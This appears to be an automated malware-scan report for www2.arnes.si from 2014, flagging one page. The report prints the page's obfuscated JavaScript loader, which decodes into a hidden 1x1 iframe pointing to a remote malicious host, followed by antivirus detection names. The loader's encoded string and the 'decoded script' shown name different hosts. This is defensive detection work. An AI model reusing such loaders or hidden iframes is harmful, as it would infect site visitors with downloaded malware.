New scan:

Malware Scanner report for www2.arnes.si

Malicious/Suspicious/Total urls checked
1/0/9
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://www2.arnes.si/~bzidan
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 23 Oct 2014 08:05:18 GMT
Location: http://www2.arnes.si/~bzidan/
Server: Apache
Content-Length: 300
Content-Type: text/html; charset=iso-8859-1
clean
http://www2.arnes.si/~bzidan/
200 OK
Content-Length: 10689
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function ge35ebc1854(a6cd0b741){var ab6b21af='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var k69359ed8='';var ka36c8b,d274c8b,a4430c2,h890589c2,w2c792f5d,i92032e5,d04cba01;var pea655a=0;do{h890589c2=ab6b21af.indexOf(a6cd0b741.charAt(pea655a++));w2c792f5d=ab6b21af.indexOf(a6cd0b741.charAt(pea655a++));i92032e5=ab6b21af.indexOf(a6cd0b741.charAt(pea655a++));d04cba01=ab6b21af.indexOf(a6cd0b741.charAt(pea655a++));ka36c8b=(h890589c2<<2)|(w2c792f5d>>4);d274c8b=((w2c79
... 204 bytes are skipped ...
g.fromCharCode(ka36c8b);if(i92032e5!=64){if(d274c8b>=192)d274c8b+=848;else if(d274c8b==168)d274c8b=1025;else if(d274c8b==184)d274c8b=1105;k69359ed8+=String.fromCharCode(d274c8b);}if(d04cba01!=64){if(a4430c2>=192)a4430c2+=848;else if(a4430c2==168)a4430c2=1025;else if(a4430c2==184)a4430c2=1105;k69359ed8+=String.fromCharCode(a4430c2);}}while(pea655a<a6cd0b741.length);document.write(k69359ed8);};ge35ebc1854('PGlmcmFtZSBzcmMgPSAiaHR0cDovL25ld2hhcHB5bWF5LmNvbS8xLyIgd2lkdGg9MSBoZWlnaHQ9MT4A');

Decoded script:


<iframe src="http://yt6tyg.cn/1/index.php" width="1" height="1" frameborder="0"></iframe>

Antivirus reports:

nProtect
JS:Trojan.Crypt.JV
Emsisoft
JS:Trojan.Crypt.JV (B)
Kaspersky
Trojan-Downloader.JS.Iframe.byo
MicroWorld-eScan
JS:Trojan.Crypt.JV
Fortinet
JS/Iframe.BYO!tr
NANO-Antivirus
Trojan.Url.IframeB.bqouic
F-Secure
JS:Trojan.Crypt.JV
GData
JS:Trojan.Crypt.JV
BitDefender
JS:Trojan.Crypt.JV

http://www2.arnes.si/~bzidan/Res/code/shared.js
200 OK
Content-Length: 5448
Content-Type: application/x-javascript
clean
http://www2.arnes.si/Res/code/boxController.js
404 Not Found
Content-Length: 286
Content-Type: text/html
clean
http://www2.arnes.si/test404page.js
404 Not Found
Content-Length: 275
Content-Type: text/html
clean
http://www2.arnes.si/Res/code/boxSettings.js
404 Not Found
Content-Length: 284
Content-Type: text/html
clean
http://www2.arnes.si/Res/tree/tree.js
404 Not Found
Content-Length: 277
Content-Type: text/html
clean
http://www2.arnes.si/Res/tree/tree_items.js
404 Not Found
Content-Length: 283
Content-Type: text/html
clean
http://www2.arnes.si/Res/tree/tree_tpl.js
404 Not Found
Content-Length: 281
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: www2.arnes.si

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: www2.arnes.si
Referer: http://www.google.com/search?q=www2.arnes.si

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=www2.arnes.si

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://www2.arnes.si/

Result: www2.arnes.si is not infected or malware details are not published yet.